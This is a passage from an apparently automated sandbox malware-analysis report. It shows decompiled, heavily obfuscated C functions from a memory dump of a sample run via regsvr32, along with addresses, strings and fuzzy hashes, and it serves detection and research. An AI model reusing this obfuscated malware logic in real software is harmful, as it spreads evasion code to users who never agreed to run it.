				_v92 = 0x9715d8;
				_v92 = _v92 * 0x46;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0xff220000;
				_v52 = 0xfde3f2;
				_v52 = _v52 + 0xa710;
				_v52 = _v52 ^ 0x00fe8b02;
				_v160 = 0x198337;
				_v160 = _v160 + 0xffff007e;
				_v160 = _v160 << 0x10;
				_v160 = _v160 ^ 0x69569842;
				_v160 = _v160 ^ 0xeaeb46e9;
				_v28 = 0xcc69bd;
				_v28 = _v28 ^ 0xeecfab9f;
				_v28 = _v28 ^ 0xee01123b;
				_v136 = 0x76b317;
				_v136 = _v136 / _t370;
				_v136 = _v136 + 0xffff81f3;
				_v136 = _v136 << 3;
				_v136 = _v136 ^ 0x00064d41;
				_v112 = 0x80a4bd;
				_v112 = _v112 * 0x13;
				_v112 = _v112 << 0xa;
				_v112 = _v112 + 0xcad4;
				_v112 = _v112 ^ 0x30efc400;
				_v144 = 0x82a288;
				_v144 = _v144 << 2;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 << 9;
				_v144 = _v144 ^ 0x0011be13;
				_v56 = 0x7edd30;
				_v56 = _v56 * 0x55;
				_v56 = _v56 ^ 0x2a184bb4;
				_v88 = 0xe2a415;
				_t371 = 6;
				_v88 = _v88 * 0x2a;
				_v88 = _v88 + 0xffff5f32;
				_v88 = _v88 ^ 0x252ac732;
				_v128 = 0xe004bc;
				_v128 = _v128 ^ 0x574173bd;
				_v128 = _v128 >> 9;
				_v128 = _v128 ^ 0xd8221cc5;
				_v128 = _v128 ^ 0xd803a3d4;
				_v152 = 0x516ea5;
				_v152 = _v152 + 0xffff4486;
				_v152 = _v152 | 0x140257d0;
				_v152 = _v152 >> 0xf;
				_v152 = _v152 ^ 0x00051039;
				_v120 = 0x9f4975;
				_v120 = _v120 ^ 0x86b89632;
				_v120 = _v120 * 0x24;
				_v120 = _v120 | 0x1b5f0b87;
				_v120 = _v120 ^ 0xdfd1de63;
				_v36 = 0xa5f8e9;
				_v36 = _v36 + 0x714e;
				_v36 = _v36 ^ 0x00af22d8;
				_v44 = 0x824fdb;
				_v44 = _v44 + 0xffff91e5;
				_v44 = _v44 ^ 0x008fd473;
				_v68 = 0x680ab0;
				_v68 = _v68 + 0xbc39;
				_v68 = _v68 / _t371;
				_v68 = _v68 ^ 0x001a68c1;
				_v76 = 0x17a4af;
				_v76 = _v76 >> 0xb;
				_t372 = 0x5b;
				_v76 = _v76 / _t372;
				_v76 = _v76 ^ 0x0007f211;
				_v84 = 0x315e60;
				_v84 = _v84 + 0x702b;
				_v84 = _v84 + 0xffff10cc;
				_v84 = _v84 ^ 0x003e64ec;
				_v100 = 0x9cc34d;
				_v100 = _v100 | 0x947c2ff5;
				_t373 = 0x3a;
				_v100 = _v100 / _t373;
				_v100 = _v100 ^ 0x02979c4b;
				_v140 = 0xbfeff4;
				_v140 = _v140 ^ 0x822e0370;
				_v140 = _v140 + 0xf2f6;
				_v140 = _v140 | 0x96ab8507;
				_v140 = _v140 ^ 0x96bf89b8;
				_v60 = 0xfd95c4;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x07e16726;
				_v148 = 0x38036;
				_v148 = _v148 ^ 0x54103d5f;
				_v148 = _v148 | 0x54303272;
				_t206 =  &_v148; // 0x54303272
				_v148 =  *_t206;
				_v148 = _v148 ^ 0x5432cd2c;
				_v40 = 0xc550eb;
				_v40 = _v40 | 0x63f29c9e;
				_v40 = _v40 ^ 0x63f29262;
				_v32 = 0xf7791b;
				_v32 = _v32 * 0x51;
				_v32 = _v32 ^ 0x4e4d9c2b;
				_v156 = 0xdcae59;
				_v156 = _v156 + 0xffffc6cd;
				_v156 = _v156 + 0xfffffd52;
				_v156 = _v156 ^ 0x46382038;
				_v156 = _v156 ^ 0x46e78b29;
				_v72 = 0xac5d66;
				_v72 = _v72 | 0xb655dd15;
				_v72 = _v72 + 0xffff07b1;
				_v72 = _v72 ^ 0xb6f51c6c;
				_v104 = 0x2e3a8e;
				_v104 = _v104 | 0xfac334a1;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xaefe5277;
				_v108 = 0xcd35f0;
				_v108 = _v108 << 0xf;
				_v108 = _v108 | 0xf31160b4;
				_v108 = _v108 ^ 0xc3cc8d90;
				_v108 = _v108 ^ 0x3831362e;
				_v116 = 0x7e4b3f;
				_v116 = _v116 << 9;
				_v116 = _v116 + 0xa646;
				_v116 = _v116 + 0x5b3c;
				_v116 = _v116 ^ 0xfc982242;
				_v124 = 0x9fd9df;
				_v124 = _v124 >> 6;
				_v124 = _v124 << 0xf;
				_v124 = _v124 << 1;
				_v124 = _v124 ^ 0x7f607f7f;
				do {
					while(_t351 != 0x8274db) {
						if(_t351 == 0x30c1656) {
							_push(_t351);
							_push(_t351);
							_t339 = E04B8C5D8(_v20);
							_t376 = _t376 + 0xc;
							_v24 = _t339;
							if(_t339 != 0) {
								_t351 = 0x6ee5562;
								continue;
							}
						} else {
							if(_t351 == 0x6ee5562) {
								_t341 =  *0x4ba6224; // 0x0
								_t343 = E04BA11B0(_v84, _t351, _v92, _v100, _v132, _v140, _v60, _v148, _v20,  *_t369, _v40,  *((intOrPtr*)(_t369 + 4)), _v32,  &_v20, _v156, _v72, _v24,  *_t341, _v104);
								_t376 = _t376 + 0x48;
								if(_t343 == _v52) {
									 *_t349 = _v24;
									_t367 = 1;
									 *((intOrPtr*)(_t349 + 4)) = _v20;
								} else {
									_t351 = 0x8274db;
									continue;
								}
							} else {
								if(_t351 == 0xc41b31c) {
									_t346 =  *0x4ba6224; // 0x0
									_t348 = E04BA11B0(_v160, _t351, _v48, _v28, _v96, _v136, _v112, _v144, _v64,  *_t369, _v56,  *((intOrPtr*)(_t369 + 4)), _v88,  &_v20, _v128, _v152, _t367,  *_t346, _v120);
									_t376 = _t376 + 0x48;
									if(_t348 == _v80) {
										_t351 = 0x30c1656;
										continue;
									}
								} else {
									if(_t351 != 0xff449f4) {
										goto L14;
									} else {
										_t351 = 0xc41b31c;
										continue;
									}
								}
							}
						}
						L17:
						return _t367;
					}
					E04BA2B09(_v108, _v24, _v116, _v124);
					_t351 = 0xc0b2195;
					L14:
				} while (_t351 != 0xc0b2195);
				goto L17;
			}

0x04ba46c6
0x04ba46cd
0x04ba46d0
0x04ba46d1
0x04ba46d8
0x04ba46df
0x04ba46e6
0x04ba46e7
0x04ba46e8
0x04ba46ed
0x04ba46f8
0x04ba46fa
0x04ba4705
0x04ba4708
0x04ba4711
0x04ba4719
0x04ba471e
0x04ba4723
0x04ba472b
0x04ba4733
0x04ba473b
0x04ba474a
0x04ba474b
0x04ba474f
0x04ba4754
0x04ba475c
0x04ba4767
0x04ba476f
0x04ba477a
0x04ba4782
0x04ba4787
0x04ba478f
0x04ba4797
0x04ba479f
0x04ba47a3
0x04ba47ab
0x04ba47b8
0x04ba47bc
0x04ba47c1
0x04ba47c9
0x04ba47d4
0x04ba47df
0x04ba47ea
0x04ba47f2
0x04ba47fa
0x04ba47ff
0x04ba4807
0x04ba480f
0x04ba481a
0x04ba4825
0x04ba4830
0x04ba483e
0x04ba4842
0x04ba484a
0x04ba484f
0x04ba4857
0x04ba4864
0x04ba4868
0x04ba486d
0x04ba4875
0x04ba487d
0x04ba4885
0x04ba488a
0x04ba488f
0x04ba4894
0x04ba489c
0x04ba48a9
0x04ba48ad
0x04ba48b5
0x04ba48c6
0x04ba48c9
0x04ba48cd
0x04ba48d5
0x04ba48dd
0x04ba48e5
0x04ba48ed
0x04ba48f2
0x04ba48fa
0x04ba4902
0x04ba490a
0x04ba4912
0x04ba491a
0x04ba491f
0x04ba4927
0x04ba492f
0x04ba493c
0x04ba4940
0x04ba4948
0x04ba4950
0x04ba495b
0x04ba4966
0x04ba4971
0x04ba497c
0x04ba4987
0x04ba4992
0x04ba499a
0x04ba49aa
0x04ba49ae
0x04ba49b6
0x04ba49be
0x04ba49c7
0x04ba49cc
0x04ba49d2
0x04ba49da
0x04ba49e2
0x04ba49ea
0x04ba49f2
0x04ba49fa
0x04ba4a02
0x04ba4a0e
0x04ba4a11
0x04ba4a15
0x04ba4a1d
0x04ba4a25
0x04ba4a2d
0x04ba4a35
0x04ba4a3d
0x04ba4a45
0x04ba4a4d
0x04ba4a52
0x04ba4a5a
0x04ba4a62
0x04ba4a6a
0x04ba4a72
0x04ba4a76
0x04ba4a7a
0x04ba4a82
0x04ba4a8d
0x04ba4a98
0x04ba4aa3
0x04ba4ab6
0x04ba4abd
0x04ba4ac8
0x04ba4ad0
0x04ba4ad8
0x04ba4ae0
0x04ba4aed
0x04ba4af5
0x04ba4afd
0x04ba4b05
0x04ba4b0d
0x04ba4b15
0x04ba4b1d
0x04ba4b25
0x04ba4b2a
0x04ba4b32
0x04ba4b3a
0x04ba4b3f
0x04ba4b47
0x04ba4b4f
0x04ba4b57
0x04ba4b5f
0x04ba4b64
0x04ba4b6c
0x04ba4b74
0x04ba4b7c
0x04ba4b84
0x04ba4b89
0x04ba4b8e
0x04ba4b92
0x04ba4b9a
0x04ba4b9a
0x04ba4ba8
0x04ba4cdd
0x04ba4cde
0x04ba4ce6
0x04ba4ceb
0x04ba4cee
0x04ba4cf7
0x04ba4cf9
0x00000000
0x04ba4cf9
0x04ba4bae
0x04ba4bb4
0x04ba4c4e
0x04ba4caf
0x04ba4cb4
0x04ba4cbe
0x04ba4d39
0x04ba4d3b
0x04ba4d43
0x04ba4cc0
0x04ba4cc0
0x00000000
0x04ba4cc0
0x04ba4bba
0x04ba4bc0
0x04ba4bd9
0x04ba4c2e
0x04ba4c33
0x04ba4c3a
0x04ba4c40
0x00000000
0x04ba4c40
0x04ba4bc2
0x04ba4bc8
0x00000000
0x04ba4bce
0x04ba4bce
0x00000000
0x04ba4bce
0x04ba4bc8
0x04ba4bc0
0x04ba4bb4
0x04ba4d46
0x04ba4d52
0x04ba4d52
0x04ba4d16
0x04ba4d1d
0x04ba4d22
0x04ba4d22
0x00000000

Strings

?K~, xrefs: 04BA4B57
F, xrefs: 04BA4807
<[, xrefs: 04BA4B6C
Nq, xrefs: 04BA495B
r20T, xrefs: 04BA4A72
.618, xrefs: 04BA4B4F
d>, xrefs: 04BA49F2
8 8F, xrefs: 04BA4AE0

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .618$8 8F$<[$?K~$Nq$r20T$F$d>
API String ID: 0-914106314
Opcode ID: 280c063baa3b7f826a2e69aa95d3d86449e6efcd110cfc07a7c93b5465f4f974
Instruction ID: a1b42149a3b780f8560310c0c949bafdd30839daea1b2e2a6c7b1ad3f1adcd3d
Opcode Fuzzy Hash: 280c063baa3b7f826a2e69aa95d3d86449e6efcd110cfc07a7c93b5465f4f974
Instruction Fuzzy Hash: DCF1FD71009380DFD769CF61C98AA4BBBF1FB85748F108A1DE2DA86260D3B59958DF03

Uniqueness

Uniqueness Score: -1.00%

Function 04B9017B, Relevance: 10.3, Strings: 8, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E04B9017B(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _t272;
				void* _t295;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				void* _t312;
				void* _t334;
				intOrPtr _t335;
				signed int* _t338;

				_push(_a32);
				_t334 = __ecx;
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t272 = E04B9FE29(0);
				_v84 = _t272;
				_t338 =  &(( &_v196)[0xa]);
				_v72 = _t272;
				_t335 = _t272;
				_v80 = 0x49e87b;
				_v76 = 0xc5c8e1;
				_t312 = 0x7956bd9;
				_v96 = 0x2d2511;
				_t305 = 0x6f;
				_v96 = _v96 / _t305;
				_v96 = _v96 ^ 0x00006c1e;
				_v192 = 0x2be237;
				_t22 =  &_v192; // 0x2be237
				_t306 = 0x35;
				_v192 =  *_t22 * 0x2a;
				_v192 = _v192 ^ 0x8f196f07;
				_v192 = _v192 ^ 0x2da4b7e5;
				_v192 = _v192 ^ 0xa58ec5c4;
				_v172 = 0x207d98;
				_v172 = _v172 ^ 0x972b32db;
				_v172 = _v172 | 0x9c7c4c28;
				_v172 = _v172 * 0x48;
				_v172 = _v172 ^ 0xdbcfdb8a;
				_v100 = 0x57c7e;
				_v100 = _v100 + 0xffffdd89;
				_v100 = _v100 ^ 0x000aed2d;
				_v124 = 0x64cad1;
				_v124 = _v124 + 0xffff2d5b;
				_v124 = _v124 << 4;
				_v124 = _v124 ^ 0x063cb223;
				_v148 = 0xd38c19;
				_v148 = _v148 >> 7;
				_v148 = _v148 >> 0xf;
				_v148 = _v148 ^ 0x0008e1ac;
				_v88 = 0xe6598d;
				_v88 = _v88 ^ 0xb40d33dc;
				_v88 = _v88 ^ 0xb4eaaa1c;
				_v92 = 0x85b818;
				_v92 = _v92 + 0xffffc4c3;
				_v92 = _v92 ^ 0x008e2283;
				_v104 = 0x6cafca;
				_v104 = _v104 * 0x73;
				_v104 = _v104 ^ 0x30d8f33f;
				_v120 = 0xea107;
				_v120 = _v120 / _t306;
				_v120 = _v120 ^ 0x000228b8;
				_v112 = 0x4bcc54;
				_v112 = _v112 * 0x3f;
				_v112 = _v112 ^ 0x12af13c7;
				_v176 = 0x25f352;
				_v176 = _v176 * 0x1d;
				_t307 = 0x55;
				_v176 = _v176 / _t307;
				_v176 = _v176 + 0xa166;
				_v176 = _v176 ^ 0x00018b34;
				_v168 = 0x70163a;
				_v168 = _v168 | 0xb665b778;
				_v168 = _v168 + 0xffff15cb;
				_v168 = _v168 + 0xffff931b;
				_v168 = _v168 ^ 0xb6787764;
				_v184 = 0xfb3451;
				_t308 = 0x2f;
				_v184 = _v184 * 0x55;
				_v184 = _v184 + 0xffff75a5;
				_v184 = _v184 * 0x5c;
				_v184 = _v184 ^ 0xf953722f;
				_v160 = 0x3448db;
				_v160 = _v160 | 0x0a9a3806;
				_v160 = _v160 + 0xffffbb3e;
				_v160 = _v160 << 6;
				_v160 = _v160 ^ 0xaf82d104;
				_v108 = 0x7f4bc6;
				_v108 = _v108 * 0x47;
				_v108 = _v108 ^ 0x234271fe;
				_v116 = 0x137e80;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0x09bed852;
				_v140 = 0x58b738;
				_v140 = _v140 >> 3;
				_v140 = _v140 / _t308;
				_v140 = _v140 ^ 0x0006291c;
				_v152 = 0x1dae44;
				_v152 = _v152 + 0xb010;
				_t309 = 0x7a;
				_v152 = _v152 / _t309;
				_v152 = _v152 ^ 0x0004435a;
				_v136 = 0x3e9c6a;
				_v136 = _v136 + 0xffff4267;
				_v136 = _v136 + 0xa013;
				_v136 = _v136 ^ 0x00313444;
				_v128 = 0xfc4661;
				_v128 = _v128 ^ 0x84ef8931;
				_v128 = _v128 >> 6;
				_v128 = _v128 ^ 0x021c54a7;
				_v144 = 0x2fd65c;
				_v144 = _v144 | 0x65ad1a2d;
				_v144 = _v144 ^ 0x87299bd7;
				_v144 = _v144 ^ 0xe281bdf5;
				_v180 = 0x40c6e5;
				_v180 = _v180 + 0xffff5f75;
				_v180 = _v180 + 0x6863;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x08e53add;
				_v132 = 0x50fbcf;
				_v132 = _v132 | 0xda091e24;
				_v132 = _v132 + 0xffffc3f6;
				_v132 = _v132 ^ 0xda5ae4d8;
				_v188 = 0x29fd87;
				_v188 = _v188 | 0x249d2c08;
				_v188 = _v188 << 1;
				_v188 = _v188 | 0xc4033418;
				_v188 = _v188 ^ 0xcd7b5999;
				_v196 = 0x78de76;
				_v196 = _v196 * 0x7c;
				_v196 = _v196 + 0xffff171c;
				_v196 = _v196 >> 5;
				_v196 = _v196 ^ 0x01d3afb7;
				_v156 = 0x2e37f5;
				_v156 = _v156 + 0xffff32dd;
				_v156 = _v156 >> 1;
				_v156 = _v156 * 0x73;
				_v156 = _v156 ^ 0x0a367c41;
				_v164 = 0x79bcb0;
				_v164 = _v164 + 0x8106;
				_v164 = _v164 + 0x4469;
				_v164 = _v164 + 0xffff19e3;
				_v164 = _v164 ^ 0x007fae8c;
				do {
					while(_t312 != 0x59e10b1) {
						if(_t312 == 0x7956bd9) {
							_t312 = 0x84e17ac;
							continue;
						} else {
							if(_t312 == 0x84e17ac) {
								_t264 =  &_v84; // 0x49e87b
								_t267 =  &_v172; // 0xa367c41
								_t295 = E04B94178( *_t267, _v100, _t264, _a20, _v124);
								_t338 =  &(_t338[4]);
								__eflags = _t295;
								if(_t295 != 0) {
									_t312 = 0x9148c69;
									continue;
								}
							} else {
								_t344 = _t312 - 0x9148c69;
								if(_t312 != 0x9148c69) {
									goto L10;
								} else {
									E04B9FE2A(_v148, _v88, 0x44,  &_v68);
									_push(_v112);
									_v68 = 0x44;
									_push(_v120);
									_push(_v104);
									_v60 = E04B9E1F8(0x4b81224, _v92, _t344);
									_t335 = E04B8473D(_a20, _v176, _v168, 0x4b81224, 0x4b81224, _v184, _v160, 0, _a24, _v108, _t334, _v116, _v140, _v152, _v84, 0x4b81224, _v136, _v128, _v144, _v192 | _v96,  &_v68);
									E04B9FECB(_v60, _v180, _v132, _v188, _v196);
									_t338 =  &(_t338[0x1c]);
									_t312 = 0x59e10b1;
									continue;
								}
							}
						}
						goto L11;
					}
					_t269 =  &_v84; // 0x49e87b
					E04B97952(_v156,  *_t269, _v164);
					_t312 = 0xf5fdc0f;
					L10:
					__eflags = _t312 - 0xf5fdc0f;
				} while (_t312 != 0xf5fdc0f);
				L11:
				return _t335;
			}

0x04b90185
0x04b9018e
0x04b90190
0x04b90197
0x04b9019e
0x04b901a5
0x04b901ac
0x04b901b3
0x04b901b4
0x04b901bb
0x04b901bc
0x04b901bd
0x04b901c2
0x04b901c9
0x04b901cc
0x04b901d3
0x04b901d5
0x04b901e2
0x04b901ed
0x04b901f2
0x04b90200
0x04b90205
0x04b9020b
0x04b90213
0x04b9021b
0x04b90220
0x04b90221
0x04b90225
0x04b9022d
0x04b90235
0x04b9023d
0x04b90245
0x04b9024d
0x04b9025a
0x04b9025e
0x04b90266
0x04b9026e
0x04b90276
0x04b9027e
0x04b90286
0x04b9028e
0x04b90293
0x04b9029b
0x04b902a3
0x04b902a8
0x04b902ad
0x04b902b5
0x04b902bd
0x04b902c5
0x04b902cd
0x04b902d5
0x04b902dd
0x04b902e5
0x04b902f2
0x04b902f6
0x04b902fe
0x04b9030c
0x04b90310
0x04b90318
0x04b90325
0x04b90329
0x04b90331
0x04b9033e
0x04b9034a
0x04b9034f
0x04b90355
0x04b9035d
0x04b90365
0x04b9036d
0x04b90375
0x04b9037d
0x04b90385
0x04b9038d
0x04b9039a
0x04b9039d
0x04b903a1
0x04b903ae
0x04b903b2
0x04b903ba
0x04b903c2
0x04b903ca
0x04b903d2
0x04b903d7
0x04b903df
0x04b903ec
0x04b903f0
0x04b903f8
0x04b90400
0x04b90405
0x04b9040d
0x04b90415
0x04b90422
0x04b90426
0x04b9042e
0x04b90436
0x04b90442
0x04b90445
0x04b90449
0x04b90451
0x04b90459
0x04b90461
0x04b90469
0x04b90471
0x04b90479
0x04b90481
0x04b90486
0x04b9048e
0x04b90496
0x04b9049e
0x04b904a6
0x04b904ae
0x04b904b6
0x04b904be
0x04b904c6
0x04b904cb
0x04b904d3
0x04b904db
0x04b904e3
0x04b904eb
0x04b904f3
0x04b904fb
0x04b90503
0x04b90507
0x04b9050f
0x04b90517
0x04b90524
0x04b90528
0x04b90530
0x04b90535
0x04b9053d
0x04b9054a
0x04b90557
0x04b90560
0x04b90564
0x04b9056c
0x04b90574
0x04b9057c
0x04b90584
0x04b9058c
0x04b90594
0x04b90594
0x04b905a6
0x04b906c4
0x00000000
0x04b905ac
0x04b905ae
0x04b9069a
0x04b906ad
0x04b906b1
0x04b906b6
0x04b906b9
0x04b906bb
0x04b906bd
0x00000000
0x04b906bd
0x04b905b4
0x04b905b4
0x04b905b6
0x00000000
0x04b905bc
0x04b905ce
0x04b905d3
0x04b905dc
0x04b905e7
0x04b905eb
0x04b905fe
0x04b9066c
0x04b90684
0x04b90689
0x04b9068c
0x00000000
0x04b9068c
0x04b905b6
0x04b905ae
0x00000000
0x04b905a6
0x04b906cf
0x04b906da
0x04b906e0
0x04b906e5
0x04b906e5
0x04b906e5
0x04b906f2
0x04b906fd

Strings

ch, xrefs: 04B904BE
{I, xrefs: 04B9069A, 04B906A8
A|6, xrefs: 04B906AD
7+, xrefs: 04B9021B
iD, xrefs: 04B9057C
D, xrefs: 04B905DC
-, xrefs: 04B90276
D41, xrefs: 04B90469

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -$7+$A|6$D$D41$ch$iD${I
API String ID: 0-1622838380
Opcode ID: 920e2665d4a6ae30f317e574420ae12b2df51474f540ac76364eef4adaace39d
Instruction ID: ece3ec8ec7485adc97d21fecb5a88cdec6354cb4d742a90a3faa264b834627db
Opcode Fuzzy Hash: 920e2665d4a6ae30f317e574420ae12b2df51474f540ac76364eef4adaace39d
Instruction Fuzzy Hash: BED110B25083819FD768CF61C489A1BFBE1FBC5358F508A2DF69596260D3B59948CF03

Uniqueness

Uniqueness Score: -1.00%

Function 04B927F9, Relevance: 10.2, Strings: 8, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B927F9() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				short* _t249;
				void* _t251;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t260;
				intOrPtr _t267;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int* _t294;

				_t294 =  &_v1144;
				_v1076 = 0xe2454d;
				_v1076 = _v1076 << 0xe;
				_t260 = 0xa27996a;
				_v1076 = _v1076 ^ 0x9150c829;
				_v1116 = 0xb7d7ba;
				_v1116 = _v1116 >> 3;
				_v1116 = _v1116 * 0x45;
				_v1116 = _v1116 ^ 0x0637cdcd;
				_v1064 = 0x633f3;
				_t288 = 7;
				_v1064 = _v1064 / _t288;
				_v1064 = _v1064 ^ 0x000e68da;
				_v1044 = 0x68e137;
				_v1044 = _v1044 >> 8;
				_v1044 = _v1044 ^ 0x000f94d8;
				_v1104 = 0x560a82;
				_t289 = 0x4d;
				_v1104 = _v1104 * 0x12;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 ^ 0x32f73e43;
				_v1128 = 0x20b49c;
				_v1128 = _v1128 + 0xffff9350;
				_v1128 = _v1128 / _t289;
				_v1128 = _v1128 + 0xffff69f1;
				_v1128 = _v1128 ^ 0xfff8ef71;
				_v1144 = 0xda057e;
				_v1144 = _v1144 | 0x61d5fb11;
				_v1144 = _v1144 + 0x9b0d;
				_t290 = 0x47;
				_v1144 = _v1144 / _t290;
				_v1144 = _v1144 ^ 0x016fc7d6;
				_v1108 = 0xd954d9;
				_v1108 = _v1108 >> 3;
				_v1108 = _v1108 * 0x2a;
				_v1108 = _v1108 ^ 0x047d2f3f;
				_v1084 = 0xee9532;
				_v1084 = _v1084 | 0x01e1ea12;
				_v1084 = _v1084 * 0x5e;
				_v1084 = _v1084 ^ 0xb61982a0;
				_v1136 = 0x9da312;
				_v1136 = _v1136 * 0xb;
				_v1136 = _v1136 + 0xfaec;
				_v1136 = _v1136 << 4;
				_v1136 = _v1136 ^ 0x6c675c41;
				_v1048 = 0x5b4722;
				_v1048 = _v1048 + 0x58c6;
				_v1048 = _v1048 ^ 0x0051fe1e;
				_v1140 = 0xb81c47;
				_v1140 = _v1140 | 0xf47f3da9;
				_v1140 = _v1140 + 0xffffb1b6;
				_v1140 = _v1140 * 0x52;
				_v1140 = _v1140 ^ 0x79a8ba01;
				_v1100 = 0x4ec91e;
				_v1100 = _v1100 + 0xffff658a;
				_v1100 = _v1100 + 0xa7da;
				_v1100 = _v1100 ^ 0x004d9e7a;
				_v1056 = 0xd22e34;
				_v1056 = _v1056 * 0x39;
				_v1056 = _v1056 ^ 0x2eccf222;
				_v1092 = 0x4415ff;
				_v1092 = _v1092 << 0xc;
				_v1092 = _v1092 + 0xffffcb4f;
				_v1092 = _v1092 ^ 0x4156ca29;
				_v1112 = 0xebdea7;
				_v1112 = _v1112 + 0xffff30b5;
				_v1112 = _v1112 ^ 0x44658fef;
				_v1112 = _v1112 ^ 0x4481ff75;
				_v1132 = 0x210e2f;
				_v1132 = _v1132 + 0x4766;
				_v1132 = _v1132 >> 6;
				_t291 = 0x78;
				_v1132 = _v1132 / _t291;
				_v1132 = _v1132 ^ 0x000739d3;
				_v1072 = 0xec15b6;
				_v1072 = _v1072 + 0xf74;
				_v1072 = _v1072 ^ 0x00e11cf3;
				_v1096 = 0xda8ada;
				_v1096 = _v1096 >> 0xe;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x00036eb4;
				_v1120 = 0x69db3;
				_v1120 = _v1120 + 0x311c;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x00187b2b;
				_v1068 = 0x7459e2;
				_v1068 = _v1068 >> 8;
				_v1068 = _v1068 ^ 0x000d8df4;
				_v1060 = 0x7a5957;
				_v1060 = _v1060 + 0x9cd0;
				_v1060 = _v1060 ^ 0x007b6b01;
				_v1088 = 0xc3c012;
				_v1088 = _v1088 >> 0x10;
				_v1088 = _v1088 << 5;
				_v1088 = _v1088 ^ 0x00089583;
				_v1124 = 0x7ac281;
				_v1124 = _v1124 >> 0xa;
				_v1124 = _v1124 >> 0xf;
				_v1124 = _v1124 + 0xc97f;
				_v1124 = _v1124 ^ 0x00055573;
				_v1052 = 0x890174;
				_v1052 = _v1052 + 0xa006;
				_v1052 = _v1052 ^ 0x008bc550;
				_v1080 = 0xeb1cb6;
				_v1080 = _v1080 ^ 0x4b3beb78;
				_v1080 = _v1080 >> 0x10;
				_v1080 = _v1080 ^ 0x00025049;
				while(_t260 != 0x3b56309) {
					if(_t260 == 0x7219719) {
						E04B9DC71();
						L8:
						_t260 = 0x9bc0f5a;
						continue;
					}
					if(_t260 == 0x9631a61) {
						_t249 = E04B909DD(_v1060,  &_v1040, _v1088, _v1124);
						__eflags = 0;
						 *_t249 = 0;
						return E04B8856E( &_v1040, _v1052, _v1080);
					}
					if(_t260 == 0x9bc0f5a) {
						_push(_v1128);
						_push(_v1104);
						_push(_v1044);
						_t251 = E04B9E1F8(0x4b81000, _v1064, __eflags);
						_t267 =  *0x4ba6214; // 0x0
						_t253 =  *0x4ba6214; // 0x0
						E04BA2D0A(_v1108, __eflags, _t253 + 0x23c, _v1084, _v1136, _v1048, _t267 + 0x34,  &_v1040, _t267 + 0x34, _t251);
						E04B9FECB(_t251, _v1140, _v1100, _v1056, _v1092);
						_t294 =  &(_t294[0xe]);
						_t260 = 0x3b56309;
						continue;
					}
					if(_t260 == 0xa27996a) {
						_t257 =  *0x4ba6214; // 0x0
						__eflags =  *((intOrPtr*)(_t257 + 0x20));
						_t260 =  !=  ? 0xb537953 : 0x7219719;
						continue;
					}
					if(_t260 != 0xb537953) {
						L13:
						__eflags = _t260 - 0xf6a818b;
						if(__eflags != 0) {
							continue;
						}
						return _t257;
					}
					_t257 = E04B8A445();
					goto L8;
				}
				E04B81CA1(_v1112, _v1132, _v1072,  &_v520);
				E04B9654A(_v1096, _v1120, __eflags,  &_v1040, _v1068,  &_v520);
				_t294 =  &(_t294[5]);
				_t260 = 0x9631a61;
				goto L13;
			}

0x04b927f9
0x04b927ff
0x04b92809
0x04b9280e
0x04b92813
0x04b9281b
0x04b92823
0x04b92831
0x04b92835
0x04b9283d
0x04b9284b
0x04b92850
0x04b92856
0x04b9285e
0x04b92866
0x04b9286b
0x04b92873
0x04b92880
0x04b92883
0x04b92887
0x04b9288c
0x04b92894
0x04b9289c
0x04b928ac
0x04b928b0
0x04b928b8
0x04b928c0
0x04b928c8
